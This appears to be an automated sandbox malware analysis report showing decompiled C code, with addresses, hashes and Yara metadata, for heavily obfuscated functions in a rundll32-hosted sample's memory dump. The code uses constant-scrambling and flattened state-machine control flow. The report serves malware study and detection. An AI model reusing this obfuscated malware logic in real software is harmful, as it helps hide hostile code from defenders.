                                                                                                                                  0x002da0cb
                                                                                                                                  0x002da0d2
                                                                                                                                  0x002da0d9
                                                                                                                                  0x002da0e0
                                                                                                                                  0x002da0e7
                                                                                                                                  0x002da0eb
                                                                                                                                  0x002da0f2
                                                                                                                                  0x002da0f5
                                                                                                                                  0x002da0fc
                                                                                                                                  0x002da103
                                                                                                                                  0x002da10a
                                                                                                                                  0x002da111
                                                                                                                                  0x002da111
                                                                                                                                  0x002da113
                                                                                                                                  0x00000000
                                                                                                                                  0x002da114
                                                                                                                                  0x002da126
                                                                                                                                  0x002da2d3
                                                                                                                                  0x002da2d9
                                                                                                                                  0x00000000
                                                                                                                                  0x002da2d9
                                                                                                                                  0x002da132
                                                                                                                                  0x002da1fa
                                                                                                                                  0x002da200
                                                                                                                                  0x002da2bf
                                                                                                                                  0x002da2c6
                                                                                                                                  0x002da2c8
                                                                                                                                  0x002da174
                                                                                                                                  0x002da174
                                                                                                                                  0x002da111
                                                                                                                                  0x002da111
                                                                                                                                  0x002da113
                                                                                                                                  0x00000000
                                                                                                                                  0x002da113
                                                                                                                                  0x002da111
                                                                                                                                  0x002da206
                                                                                                                                  0x002da20d
                                                                                                                                  0x002da236
                                                                                                                                  0x002da236
                                                                                                                                  0x002da23a
                                                                                                                                  0x002da23c
                                                                                                                                  0x002da244
                                                                                                                                  0x002da24a
                                                                                                                                  0x002da250
                                                                                                                                  0x002da273
                                                                                                                                  0x002da294
                                                                                                                                  0x002da2a1
                                                                                                                                  0x002da2a6
                                                                                                                                  0x002da2ab
                                                                                                                                  0x002da2ab
                                                                                                                                  0x002da22c
                                                                                                                                  0x002da22c
                                                                                                                                  0x00000000
                                                                                                                                  0x002da22c
                                                                                                                                  0x002da20f
                                                                                                                                  0x002da217
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002da219
                                                                                                                                  0x002da220
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002da222
                                                                                                                                  0x002da22a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002da22a
                                                                                                                                  0x002da13e
                                                                                                                                  0x002da1af
                                                                                                                                  0x002da1b7
                                                                                                                                  0x002da1d7
                                                                                                                                  0x002da1dc
                                                                                                                                  0x002da1e7
                                                                                                                                  0x002da1ed
                                                                                                                                  0x002da111
                                                                                                                                  0x002da111
                                                                                                                                  0x002da113
                                                                                                                                  0x00000000
                                                                                                                                  0x002da113
                                                                                                                                  0x002da111
                                                                                                                                  0x002da146
                                                                                                                                  0x002da192
                                                                                                                                  0x002da197
                                                                                                                                  0x002da199
                                                                                                                                  0x002da19c
                                                                                                                                  0x002da19f
                                                                                                                                  0x002da30b
                                                                                                                                  0x002da30b
                                                                                                                                  0x002da30b
                                                                                                                                  0x002da1a5
                                                                                                                                  0x00000000
                                                                                                                                  0x002da1a5
                                                                                                                                  0x002da14e
                                                                                                                                  0x002da2f9
                                                                                                                                  0x002da2f9
                                                                                                                                  0x002da2ff
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002da2ff
                                                                                                                                  0x002da161
                                                                                                                                  0x002da16c
                                                                                                                                  0x002da16e
                                                                                                                                  0x00000000
                                                                                                                                  0x002da16e
                                                                                                                                  0x002da2eb
                                                                                                                                  0x002da2f3
                                                                                                                                  0x002da2f8
                                                                                                                                  0x00000000
                                                                                                                                  0x002da2f8

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H&!$Up7$yBd&
                                                                                                                                  • API String ID: 0-2352930472
                                                                                                                                  • Opcode ID: f51d7b9375ecb25cc5626e3b8ddf3e74eca4fcf07fbbdaa1e29b436d902c38dc
                                                                                                                                  • Instruction ID: 5a33932e1bef1861a69759b38ee809becfd15a10d3c76b75550efd9280a059a8
                                                                                                                                  • Opcode Fuzzy Hash: f51d7b9375ecb25cc5626e3b8ddf3e74eca4fcf07fbbdaa1e29b436d902c38dc
                                                                                                                                  • Instruction Fuzzy Hash: 11E17671D0021EDBCF28DFE1D98A8EEBBB1FB44314F20815AE516BA264D7B40A95CF41
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E95FA Relevance: 4.0, Strings: 3, Instructions: 282COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002E95FA() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				intOrPtr _t295;
				void* _t297;
				void* _t298;
				intOrPtr _t299;
				signed int _t306;
				void* _t309;
				void* _t310;
				char _t311;
				void* _t317;
				intOrPtr _t334;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				void* _t347;

				_v668 = 0xe6fb93;
				_v668 = _v668 + 0xffff1eed;
				_t310 = 0xada6804;
				_v668 = _v668 * 0x61;
				_t309 = 0;
				_v668 = _v668 ^ 0xaca28cc6;
				_v668 = _v668 ^ 0xfb928647;
				_v616 = 0x8caf33;
				_t341 = 0x42;
				_v616 = _v616 * 0x25;
				_v616 = _v616 * 0x4f;
				_v616 = _v616 ^ 0x46546a51;
				_v620 = 0x861136;
				_v620 = _v620 | 0x52f06d4d;
				_v620 = _v620 >> 0xf;
				_v620 = _v620 ^ 0x0000a5ef;
				_v628 = 0x4cf396;
				_v628 = _v628 >> 1;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x0000133c;
				_v684 = 0xc54e58;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0xb8bf25ee;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0x2e259ad3;
				_v592 = 0x68267f;
				_v592 = _v592 + 0xffff39c4;
				_v592 = _v592 ^ 0x006c60f9;
				_v632 = 0xa1d089;
				_v632 = _v632 / _t341;
				_v632 = _v632 ^ 0x52222b14;
				_v632 = _v632 ^ 0x5220bcfc;
				_v608 = 0x39d352;
				_v608 = _v608 | 0x2e7e1ae1;
				_v608 = _v608 ^ 0x576cc274;
				_v608 = _v608 ^ 0x7911cf35;
				_v660 = 0xc26f36;
				_v660 = _v660 ^ 0x9f5dc88a;
				_v660 = _v660 ^ 0xeefda613;
				_t342 = 0x3f;
				_v660 = _v660 / _t342;
				_v660 = _v660 ^ 0x01ce77bb;
				_v624 = 0x334861;
				_v624 = _v624 + 0xffff4b1a;
				_t343 = 0x2a;
				_v624 = _v624 * 0x2f;
				_v624 = _v624 ^ 0x0947e580;
				_v652 = 0xab72b9;
				_v652 = _v652 << 8;
				_v652 = _v652 / _t343;
				_v652 = _v652 ^ 0x0419701b;
				_v688 = 0x507748;
				_v688 = _v688 << 5;
				_v688 = _v688 + 0xffff449a;
				_v688 = _v688 + 0xb858;
				_v688 = _v688 ^ 0x0a0a66f0;
				_v600 = 0x95cabc;
				_v600 = _v600 + 0xffffb185;
				_v600 = _v600 << 9;
				_v600 = _v600 ^ 0x2af43595;
				_v580 = 0x7e3ec7;
				_v580 = _v580 ^ 0x09caac24;
				_v580 = _v580 ^ 0x09b70662;
				_v612 = 0xa526a8;
				_v612 = _v612 | 0x64dab874;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 ^ 0x0006f9eb;
				_v604 = 0xb7de18;
				_t344 = 0x48;
				_v604 = _v604 * 0x79;
				_v604 = _v604 * 0x31;
				_v604 = _v604 ^ 0xa26ee4e9;
				_v640 = 0x553c00;
				_v640 = _v640 + 0xffff4196;
				_v640 = _v640 + 0xffff8daf;
				_v640 = _v640 ^ 0x00577a07;
				_v576 = 0xaac37;
				_v576 = _v576 * 0x77;
				_v576 = _v576 ^ 0x04fc3a71;
				_v676 = 0xb6ce7b;
				_v676 = _v676 >> 1;
				_v676 = _v676 * 0x28;
				_v676 = _v676 >> 0xb;
				_v676 = _v676 ^ 0x000b20b4;
				_v584 = 0x4877b4;
				_v584 = _v584 << 1;
				_v584 = _v584 ^ 0x009148e9;
				_v588 = 0xaf1c90;
				_v588 = _v588 * 0x5b;
				_v588 = _v588 ^ 0x3e3937c6;
				_v644 = 0x150bb3;
				_v644 = _v644 + 0x865c;
				_v644 = _v644 + 0x5404;
				_v644 = _v644 ^ 0x001dce65;
				_v648 = 0xaa3958;
				_v648 = _v648 / _t344;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x000a9525;
				_v596 = 0xdb2add;
				_v596 = _v596 << 0xd;
				_v596 = _v596 ^ 0x65528fd4;
				_v680 = 0xd04d0c;
				_v680 = _v680 << 5;
				_t340 = _v596;
				_v680 = _v680 * 0x55;
				_v680 = _v680 | 0x96843ebb;
				_v680 = _v680 ^ 0xb7be4a39;
				_v656 = 0x2591b4;
				_v656 = _v656 ^ 0x7517a4f1;
				_v656 = _v656 ^ 0xb20365ef;
				_v656 = _v656 + 0xffff4c4f;
				_v656 = _v656 ^ 0xc733773b;
				_v636 = 0xbfc674;
				_v636 = _v636 * 0x1d;
				_v636 = _v636 << 6;
				_v636 = _v636 ^ 0x6e5b8cbc;
				_v664 = 0x3235cc;
				_v664 = _v664 << 1;
				_v664 = _v664 | 0x857b9d7f;
				_v664 = _v664 * 0x28;
				_v664 = _v664 ^ 0xdbf98c50;
				_v672 = 0xb181ad;
				_v672 = _v672 >> 0xa;
				_v672 = _v672 << 2;
				_v672 = _v672 ^ 0xdb7e6d02;
				_v672 = _v672 ^ 0xdb78e9e9;
				do {
					while(_t310 != 0x10c1a7f) {
						if(_t310 == 0x31db0c0) {
							_t311 = _v572;
							_t295 = _v568;
							_push(_t311);
							_v560 = _t295;
							_v552 = _t295;
							_v544 = _t295;
							_v536 = _t295;
							_v564 = _t311;
							_v556 = _t311;
							_v548 = _t311;
							_v540 = _t311;
							_v532 = _v628;
							_t297 = E002D5DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
							_t347 = _t347 + 0x18;
							__eflags = _t297;
							_t309 =  !=  ? 1 : _t309;
							_t310 = 0x48f7cbb;
							continue;
						} else {
							if(_t310 == 0x461819e) {
								_push(_v660);
								_push(_v608);
								_t298 = E002EDCF7(_v632, 0x2d1000, __eflags);
								_pop(_t317);
								_t299 =  *0x2f3e10; // 0x0
								_t334 =  *0x2f3e10; // 0x0
								E002D47CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
								E002DA8B0(_v612, _t298, _v604);
								_t347 = _t347 + 0x24;
								_t310 = 0xa22489e;
								continue;
							} else {
								if(_t310 == 0x48f7cbb) {
									E002E1E67(_v656, _v636, _v664, _v672, _t340);
								} else {
									if(_t310 == 0xa22489e) {
										_t306 = E002D8F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
										_t340 = _t306;
										_t347 = _t347 + 0x28;
										__eflags = _t306 - 0xffffffff;
										if(__eflags != 0) {
											_t310 = 0x31db0c0;
											continue;
										}
									} else {
										if(_t310 == 0xada6804) {
											_t310 = 0xcbcd90e;
											continue;
										} else {
											if(_t310 != 0xcbcd90e) {
												goto L15;
											} else {
												E002EC1EC(_v684, _v592,  &_v572);
												_t310 = 0x10c1a7f;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t309;
					}
					_v572 = _v572 - E002EABD1();
					_t310 = 0x461819e;
					asm("sbb [esp+0x8c], edx");
					L15:
					__eflags = _t310 - 0x7e6efe8;
				} while (__eflags != 0);
				goto L18;
			}



























































                                                                                                                                  0x002e9600
                                                                                                                                  0x002e960a
                                                                                                                                  0x002e9612
                                                                                                                                  0x002e9620
                                                                                                                                  0x002e9624
                                                                                                                                  0x002e9626
                                                                                                                                  0x002e962e
                                                                                                                                  0x002e9636
                                                                                                                                  0x002e9645
                                                                                                                                  0x002e9648
                                                                                                                                  0x002e9651
                                                                                                                                  0x002e9655
                                                                                                                                  0x002e965d
                                                                                                                                  0x002e9665
                                                                                                                                  0x002e966d
                                                                                                                                  0x002e9672
                                                                                                                                  0x002e967a
                                                                                                                                  0x002e9682
                                                                                                                                  0x002e9686
                                                                                                                                  0x002e968b
                                                                                                                                  0x002e9693
                                                                                                                                  0x002e969b
                                                                                                                                  0x002e96a0
                                                                                                                                  0x002e96a8
                                                                                                                                  0x002e96ad
                                                                                                                                  0x002e96b5
                                                                                                                                  0x002e96bd
                                                                                                                                  0x002e96c5
                                                                                                                                  0x002e96cd
                                                                                                                                  0x002e96dd
                                                                                                                                  0x002e96e1
                                                                                                                                  0x002e96e9
                                                                                                                                  0x002e96f1
                                                                                                                                  0x002e96f9
                                                                                                                                  0x002e9701
                                                                                                                                  0x002e9709
                                                                                                                                  0x002e9711
                                                                                                                                  0x002e9719
                                                                                                                                  0x002e9721
                                                                                                                                  0x002e972d
                                                                                                                                  0x002e9732
                                                                                                                                  0x002e9738
                                                                                                                                  0x002e9740
                                                                                                                                  0x002e9748
                                                                                                                                  0x002e9755
                                                                                                                                  0x002e9756
                                                                                                                                  0x002e975a
                                                                                                                                  0x002e9762
                                                                                                                                  0x002e976a
                                                                                                                                  0x002e9775
                                                                                                                                  0x002e9779
                                                                                                                                  0x002e9781
                                                                                                                                  0x002e9789
                                                                                                                                  0x002e978e
                                                                                                                                  0x002e9796
                                                                                                                                  0x002e979e
                                                                                                                                  0x002e97a6
                                                                                                                                  0x002e97ae
                                                                                                                                  0x002e97b6
                                                                                                                                  0x002e97bb
                                                                                                                                  0x002e97c3
                                                                                                                                  0x002e97ce
                                                                                                                                  0x002e97db
                                                                                                                                  0x002e97eb
                                                                                                                                  0x002e97f3
                                                                                                                                  0x002e97fb
                                                                                                                                  0x002e9800
                                                                                                                                  0x002e9808
                                                                                                                                  0x002e9817
                                                                                                                                  0x002e9818
                                                                                                                                  0x002e9821
                                                                                                                                  0x002e9825
                                                                                                                                  0x002e982d
                                                                                                                                  0x002e9835
                                                                                                                                  0x002e983d
                                                                                                                                  0x002e9845
                                                                                                                                  0x002e984d
                                                                                                                                  0x002e9860
                                                                                                                                  0x002e9867
                                                                                                                                  0x002e9872
                                                                                                                                  0x002e987a
                                                                                                                                  0x002e9883
                                                                                                                                  0x002e9887
                                                                                                                                  0x002e988c
                                                                                                                                  0x002e9894
                                                                                                                                  0x002e989c
                                                                                                                                  0x002e98a0
                                                                                                                                  0x002e98a8
                                                                                                                                  0x002e98b5
                                                                                                                                  0x002e98b9
                                                                                                                                  0x002e98c1
                                                                                                                                  0x002e98c9
                                                                                                                                  0x002e98d1
                                                                                                                                  0x002e98d9
                                                                                                                                  0x002e98e1
                                                                                                                                  0x002e98ef
                                                                                                                                  0x002e98f3
                                                                                                                                  0x002e98f8
                                                                                                                                  0x002e9900
                                                                                                                                  0x002e9908
                                                                                                                                  0x002e990d
                                                                                                                                  0x002e9915
                                                                                                                                  0x002e991d
                                                                                                                                  0x002e9927
                                                                                                                                  0x002e992b
                                                                                                                                  0x002e992f
                                                                                                                                  0x002e9937
                                                                                                                                  0x002e993f
                                                                                                                                  0x002e9947
                                                                                                                                  0x002e994f
                                                                                                                                  0x002e9957
                                                                                                                                  0x002e995f
                                                                                                                                  0x002e9967
                                                                                                                                  0x002e9974
                                                                                                                                  0x002e9978
                                                                                                                                  0x002e997d
                                                                                                                                  0x002e9985
                                                                                                                                  0x002e998d
                                                                                                                                  0x002e9991
                                                                                                                                  0x002e999e
                                                                                                                                  0x002e99a2
                                                                                                                                  0x002e99aa
                                                                                                                                  0x002e99b2
                                                                                                                                  0x002e99b7
                                                                                                                                  0x002e99bc
                                                                                                                                  0x002e99c4
                                                                                                                                  0x002e99cc
                                                                                                                                  0x002e99cc
                                                                                                                                  0x002e99da
                                                                                                                                  0x002e9afd
                                                                                                                                  0x002e9b06
                                                                                                                                  0x002e9b0d
                                                                                                                                  0x002e9b0e
                                                                                                                                  0x002e9b15
                                                                                                                                  0x002e9b1c
                                                                                                                                  0x002e9b23
                                                                                                                                  0x002e9b32
                                                                                                                                  0x002e9b3d
                                                                                                                                  0x002e9b49
                                                                                                                                  0x002e9b54
                                                                                                                                  0x002e9b62
                                                                                                                                  0x002e9b69
                                                                                                                                  0x002e9b70
                                                                                                                                  0x002e9b74
                                                                                                                                  0x002e9b76
                                                                                                                                  0x002e9b79
                                                                                                                                  0x00000000
                                                                                                                                  0x002e99e0
                                                                                                                                  0x002e99e6
                                                                                                                                  0x002e9a87
                                                                                                                                  0x002e9a90
                                                                                                                                  0x002e9a98
                                                                                                                                  0x002e9a9e
                                                                                                                                  0x002e9aac
                                                                                                                                  0x002e9ac3
                                                                                                                                  0x002e9ad6
                                                                                                                                  0x002e9aeb
                                                                                                                                  0x002e9af0
                                                                                                                                  0x002e9af3
                                                                                                                                  0x00000000
                                                                                                                                  0x002e99ec
                                                                                                                                  0x002e99f2
                                                                                                                                  0x002e9bba
                                                                                                                                  0x002e99f8
                                                                                                                                  0x002e99fe
                                                                                                                                  0x002e9a6d
                                                                                                                                  0x002e9a72
                                                                                                                                  0x002e9a74
                                                                                                                                  0x002e9a77
                                                                                                                                  0x002e9a7a
                                                                                                                                  0x002e9a80
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9a80
                                                                                                                                  0x002e9a00
                                                                                                                                  0x002e9a06
                                                                                                                                  0x002e9a31
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9a08
                                                                                                                                  0x002e9a0e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9a14
                                                                                                                                  0x002e9a24
                                                                                                                                  0x002e9a2a
                                                                                                                                  0x00000000
                                                                                                                                  0x002e9a2a
                                                                                                                                  0x002e9a0e
                                                                                                                                  0x002e9a06
                                                                                                                                  0x002e99fe
                                                                                                                                  0x002e99f2
                                                                                                                                  0x002e99e6
                                                                                                                                  0x002e9bc5
                                                                                                                                  0x002e9bce
                                                                                                                                  0x002e9bce
                                                                                                                                  0x002e9b88
                                                                                                                                  0x002e9b8f
                                                                                                                                  0x002e9b94
                                                                                                                                  0x002e9b9b
                                                                                                                                  0x002e9b9b
                                                                                                                                  0x002e9b9b
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: HwP$QjTF$aH3
                                                                                                                                  • API String ID: 0-3950587752
                                                                                                                                  • Opcode ID: dae5bfa37d413455ae591c3b9dc314ef0363cef58e7a45c43ba671c572cbaeb6
                                                                                                                                  • Instruction ID: dccebf667bbf80b137c9a6b393d1f1ef86364b4808ead34abcf391de949af3db
                                                                                                                                  • Opcode Fuzzy Hash: dae5bfa37d413455ae591c3b9dc314ef0363cef58e7a45c43ba671c572cbaeb6
                                                                                                                                  • Instruction Fuzzy Hash: 24E11F714093819FD368CF25C58A65BBBE1FFC4748F608A1EF29686260D7B18989CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DB2C7 Relevance: 4.0, Strings: 3, Instructions: 235COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E002DB2C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v40;
				char _v48;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t137;
				intOrPtr* _t157;
				signed int _t166;
				void* _t173;
				intOrPtr _t191;
				void* _t203;
				void* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t213;
				void* _t215;
				void* _t216;
				void* _t218;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t137);
				_v136 = 0x2c5bc;
				_t216 = _t215 + 0xc;
				_t208 = 0;
				_t173 = 0xf62a13b;
				_t209 = 0x63;
				_v136 = _v136 / _t209;
				_v136 = _v136 + 0xe356;
				_v136 = _v136 ^ 0x000982ba;
				_v156 = 0x35028b;
				_v156 = _v156 | 0x143a760d;
				_v156 = _v156 + 0xfffff236;
				_v156 = _v156 ^ 0x8a3e1055;
				_v156 = _v156 ^ 0x9e033c32;
				_v128 = 0xf43d73;
				_v128 = _v128 | 0xd1983256;
				_v128 = _v128 ^ 0xd1f71de4;
				_v120 = 0x9951cf;
				_v120 = _v120 + 0xffffd11b;
				_v120 = _v120 ^ 0x00948e71;
				_v152 = 0x57fc5b;
				_v152 = _v152 | 0x88a856bb;
				_v152 = _v152 << 9;
				_v152 = _v152 + 0xa27f;
				_v152 = _v152 ^ 0xfff91174;
				_v116 = 0x3d6e6b;
				_t210 = 9;
				_v116 = _v116 / _t210;
				_v116 = _v116 ^ 0x0006b75d;
				_v140 = 0x916f20;
				_t211 = 0x35;
				_v140 = _v140 * 0x22;
				_v140 = _v140 / _t211;
				_t212 = 0x7b;
				_v140 = _v140 * 0x1d;
				_v140 = _v140 ^ 0x0a9423e2;
				_v148 = 0x96f30f;
				_v148 = _v148 ^ 0x6547be83;
				_v148 = _v148 << 9;
				_v148 = _v148 | 0xa101889a;
				_v148 = _v148 ^ 0xa391ec3d;
				_v124 = 0x9e8998;
				_v124 = _v124 | 0x73c531f9;
				_v124 = _v124 ^ 0x73d6e9c9;
				_v132 = 0xda1f74;
				_v132 = _v132 + 0x97a0;
				_v132 = _v132 ^ 0xdacfb227;
				_v132 = _v132 ^ 0xda161b2e;
				_v144 = 0x87027b;
				_t213 = _v128;
				_v144 = _v144 / _t212;
				_v144 = _v144 + 0x3568;
				_v144 = _v144 | 0x38a39b99;
				_v144 = _v144 ^ 0x38a88a96;
				while(1) {
					_t218 = _t173 - 0x628c872;
					if(_t218 > 0) {
						goto L25;
					}
					L2:
					if(_t218 == 0) {
						_push(_t173);
						_push(_t173);
						_t203 = 0x50;
						_t213 = E002D7FF2(_t203);
						__eflags = _t213;
						if(__eflags == 0) {
							L16:
							_t173 = 0xe7b6043;
							continue;
							do {
								while(1) {
									_t218 = _t173 - 0x628c872;
									if(_t218 > 0) {
										goto L25;
									}
									goto L2;
								}
								goto L25;
								L45:
								__eflags = _t173 - 0xee0c843;
							} while (__eflags != 0);
							L46:
							return _t208;
						}
						_t173 = 0xf1dea2;
						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
						continue;
					}
					if(_t173 == 0xf1dea2) {
						__eflags = _v84 - 1;
						if(__eflags == 0) {
							E002E4B87( &_v108);
							L13:
							_t173 = 0x4d68783;
							continue;
						}
						_t173 = 0x9ca47b0;
						continue;
					}
					if(_t173 == 0x1c23c86) {
						__eflags = _v84 - 4;
						if(__eflags == 0) {
							E002E6DF8( &_v108);
							goto L13;
						}
						_t173 = 0x6a06f56;
						continue;
					}
					if(_t173 == 0x45d7e1c) {
						_t157 = E002ED97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
						_t216 = _t216 + 0xc;
						__eflags = _t157;
						if(__eflags == 0) {
							goto L46;
						}
						goto L16;
					}
					if(_t173 == 0x483085d) {
						__eflags = _v84 - 7;
						if(__eflags == 0) {
							E002E0E53( &_v108);
						}
						goto L13;
					}
					if(_t173 == 0x4d68783) {
						_t191 =  *0x2f3208; // 0x0
						_t208 = _t208 + 1;
						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
						L10:
						_t173 = 0x45d7e1c;
						continue;
					}
					if(_t173 != 0x4fb7fc6) {
						goto L45;
					}
					E002E0B19(0);
					goto L10;
					L25:
					__eflags = _t173 - 0x6a06f56;
					if(_t173 == 0x6a06f56) {
						__eflags = _v84 - 5;
						if(__eflags == 0) {
							E002DB74D( &_v108, _t213);
							_t173 = 0x4d68783;
							goto L45;
						}
						_t173 = 0xcf2e7b4;
						continue;
					}
					__eflags = _t173 - 0x9a20357;
					if(_t173 == 0x9a20357) {
						__eflags = _v84 - 3;
						if(__eflags == 0) {
							E002E1889( &_v108);
							goto L13;
						}
						_t173 = 0x1c23c86;
						continue;
					}
					__eflags = _t173 - 0x9ca47b0;
					if(_t173 == 0x9ca47b0) {
						__eflags = _v84 - 2;
						if(__eflags == 0) {
							E002D9714( &_v108, _t213);
							goto L13;
						}
						_t173 = 0x9a20357;
						continue;
					}
					__eflags = _t173 - 0xcf2e7b4;
					if(_t173 == 0xcf2e7b4) {
						__eflags = _v84 - 6;
						if(__eflags == 0) {
							E002DF09B( &_v108);
							goto L13;
						}
						_t173 = 0x483085d;
						continue;
					}
					__eflags = _t173 - 0xe7b6043;
					if(_t173 == 0xe7b6043) {
						_t166 = E002DE5CF( &_v48, _v140,  &_v112, _v148);
						asm("sbb ecx, ecx");
						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
						continue;
					}
					__eflags = _t173 - 0xf62a13b;
					if(_t173 != 0xf62a13b) {
						goto L45;
					}
					E002D3DBC( &_v40, _a4, _v136, _v156, _v128);
					_t216 = _t216 + 0xc;
					_t173 = 0x4fb7fc6;
				}
			}





































                                                                                                                                  0x002db2d1
                                                                                                                                  0x002db2d8
                                                                                                                                  0x002db2d9
                                                                                                                                  0x002db2da
                                                                                                                                  0x002db2df
                                                                                                                                  0x002db2e7
                                                                                                                                  0x002db2f0
                                                                                                                                  0x002db2f2
                                                                                                                                  0x002db303
                                                                                                                                  0x002db308
                                                                                                                                  0x002db30e
                                                                                                                                  0x002db316
                                                                                                                                  0x002db31e
                                                                                                                                  0x002db326
                                                                                                                                  0x002db32e
                                                                                                                                  0x002db336
                                                                                                                                  0x002db33e
                                                                                                                                  0x002db346
                                                                                                                                  0x002db34e
                                                                                                                                  0x002db356
                                                                                                                                  0x002db35e
                                                                                                                                  0x002db366
                                                                                                                                  0x002db36e
                                                                                                                                  0x002db376
                                                                                                                                  0x002db37e
                                                                                                                                  0x002db386
                                                                                                                                  0x002db38b
                                                                                                                                  0x002db393
                                                                                                                                  0x002db39b
                                                                                                                                  0x002db3a7
                                                                                                                                  0x002db3ac
                                                                                                                                  0x002db3b2
                                                                                                                                  0x002db3ba
                                                                                                                                  0x002db3c7
                                                                                                                                  0x002db3ca
                                                                                                                                  0x002db3d6
                                                                                                                                  0x002db3df
                                                                                                                                  0x002db3e0
                                                                                                                                  0x002db3e4
                                                                                                                                  0x002db3ec
                                                                                                                                  0x002db3f4
                                                                                                                                  0x002db3fc
                                                                                                                                  0x002db401
                                                                                                                                  0x002db409
                                                                                                                                  0x002db411
                                                                                                                                  0x002db419
                                                                                                                                  0x002db421
                                                                                                                                  0x002db429
                                                                                                                                  0x002db431
                                                                                                                                  0x002db439
                                                                                                                                  0x002db441
                                                                                                                                  0x002db449
                                                                                                                                  0x002db457
                                                                                                                                  0x002db45b
                                                                                                                                  0x002db45f
                                                                                                                                  0x002db467
                                                                                                                                  0x002db46f
                                                                                                                                  0x002db477
                                                                                                                                  0x002db477
                                                                                                                                  0x002db47d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002db483
                                                                                                                                  0x002db483
                                                                                                                                  0x002db56e
                                                                                                                                  0x002db56f
                                                                                                                                  0x002db572
                                                                                                                                  0x002db578
                                                                                                                                  0x002db57c
                                                                                                                                  0x002db57e
                                                                                                                                  0x002db520
                                                                                                                                  0x002db520
                                                                                                                                  0x002db525
                                                                                                                                  0x002db477
                                                                                                                                  0x002db477
                                                                                                                                  0x002db477
                                                                                                                                  0x002db47d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002db47d
                                                                                                                                  0x00000000
                                                                                                                                  0x002db6b6
                                                                                                                                  0x002db6b6
                                                                                                                                  0x002db6b6
